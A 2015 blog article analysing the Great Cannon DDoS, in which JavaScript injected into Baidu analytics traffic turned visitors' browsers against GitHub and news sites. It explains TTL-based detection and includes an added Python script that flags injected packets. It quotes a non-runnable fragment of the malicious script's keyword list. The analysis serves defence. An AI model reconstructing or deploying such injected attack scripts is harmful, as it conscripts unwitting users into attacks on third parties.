Great Cannon of China Man-on-the-side DDoS Attack - Actual Traffic and Analysis by Chris Snow





Article Posted: 08/11/2015
So by now everyone has heard of China's Great Cannon DDoS attack on GitHub and other targets, but how did they do it? If you look at the traffic below you will see queries to a legitimate website hosted in China. In our example, because we did not want to be part of attacking the New York Times or GitHub, we queried Baidu itself for its JavaScript tracking code. This works just like Google Analytics, where websites insert the code to track users' activities, actions, referral pages and so on. However, every so often a query returns this:

"send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou"

And this is state-sponsored hostile activity from China at its worst: legitimate users landing on a Chinese website that uses Baidu's tracking code (Baidu being by far the largest search engine in China) parse this JavaScript, which tells the user's browser to open connections to the targets. Researchers at Sweden-based Netresec analyzed the technical fingerprints of the malicious JavaScript and found they are different from the remainder of the non-malicious traffic received by the one percent of computers conscripted into the DDoS army. For instance, the time-to-live (TTL) values of the packets are vastly different for the malicious content: from 30 to 229, compared with 42 for legitimate analytics code. The Netresec researchers also tried blocking one of the malicious packets so that a request would be made to the originating server for the packets to be resent. The requests were ignored. Both observations are consistent with the DDoS code being inserted by someone other than the websites using the Baidu analytics service.

Netresec could clearly identify that a man-in-the-middle attack was happening by looking at the TTL fields in the packets. TTL, or time-to-live, is a field in all Internet packets that tracks the age of the packet. Each time a router forwards a packet, one is subtracted from the field. When it reaches zero, the packet is discarded. This prevents routing loops from endlessly forwarding packets around in circles.

Many systems send packets with a starting TTL of 64. Thus, when a packet arrives with a value of 46, you know that there are 18 hops between you and the sender (64 - 18 = 46).
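The TTL comparison described above can be automated. The following is an added example, not code from the original article or from Netresec: it learns each server's TTL from its SYN-ACK and flags later packets from the same server whose TTL differs. The packet records, the documentation-range addresses and the `tolerance` parameter are constructed for illustration, with TTL values chosen inside the ranges the article quotes.

```python
from collections import Counter, defaultdict

# Common default initial TTLs used by operating systems.
COMMON_INITIAL_TTLS = (64, 128, 255)


def estimate_hops(observed_ttl):
    """Guess the sender's initial TTL and the hop count from an observed TTL."""
    for initial in COMMON_INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial, initial - observed_ttl
    raise ValueError("TTL out of range: %r" % observed_ttl)


def flow_key(p):
    return (p["src"], p["sport"], p["dst"], p["dport"])


def learn_baselines(packets):
    """Record the SYN-ACK TTL per flow, and the most common one per host."""
    per_flow = {}
    per_host = defaultdict(Counter)
    for p in packets:
        if p["flags"] == "SA":
            per_flow.setdefault(flow_key(p), p["ttl"])
            per_host[p["src"]][p["ttl"]] += 1
    host_baseline = {h: c.most_common(1)[0][0] for h, c in per_host.items()}
    return per_flow, host_baseline


def find_injected(packets, tolerance=2):
    """Return packets whose TTL deviates from the sender's handshake TTL.

    tolerance absorbs small route changes. A flow captured without its
    handshake falls back to the TTL the same host used in other handshakes.
    """
    per_flow, per_host = learn_baselines(packets)
    findings = []
    for p in packets:
        key = flow_key(p)
        if key in per_flow:
            baseline, source = per_flow[key], "handshake"
        elif p["src"] in per_host:
            baseline, source = per_host[p["src"]], "host"
        else:
            continue  # no reference TTL for this sender (e.g. the client)
        delta = p["ttl"] - baseline
        if abs(delta) > tolerance:
            findings.append({"flow": key, "flags": p["flags"], "ttl": p["ttl"],
                             "baseline": baseline, "delta": delta,
                             "baseline_source": source,
                             "hops": estimate_hops(p["ttl"])[1]})
    return findings


def pkt(src, sport, dst, dport, flags, ttl):
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "flags": flags, "ttl": ttl}


CLIENT, SERVER = "192.0.2.10", "198.51.100.80"  # constructed addresses

# Constructed capture: three flows from one client to one web server.
SAMPLE = [
    # Flow A: normal handshake, then three response packets with odd TTLs.
    pkt(CLIENT, 40001, SERVER, 80, "S", 64),
    pkt(SERVER, 80, CLIENT, 40001, "SA", 42),
    pkt(CLIENT, 40001, SERVER, 80, "PA", 64),
    pkt(SERVER, 80, CLIENT, 40001, "PA", 227),
    pkt(SERVER, 80, CLIENT, 40001, "PA", 228),
    pkt(SERVER, 80, CLIENT, 40001, "FPA", 229),
    # Flow B: handshake and response share the same TTL.
    pkt(CLIENT, 40002, SERVER, 80, "S", 64),
    pkt(SERVER, 80, CLIENT, 40002, "SA", 42),
    pkt(SERVER, 80, CLIENT, 40002, "PA", 42),
    # Flow C: capture started mid-stream, so no SYN-ACK was seen.
    pkt(SERVER, 80, CLIENT, 40003, "PA", 43),  # within tolerance
    pkt(SERVER, 80, CLIENT, 40003, "PA", 30),  # flagged via host baseline
]

if __name__ == "__main__":
    for f in find_injected(SAMPLE):
        print(f)
```

A large TTL jump inside one TCP stream is a strong hint rather than proof, so findings are best correlated with other signs the article mentions, such as retransmission requests that go unanswered.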

 


 

Here is our converted PCAP traffic sample of what was happening:

 

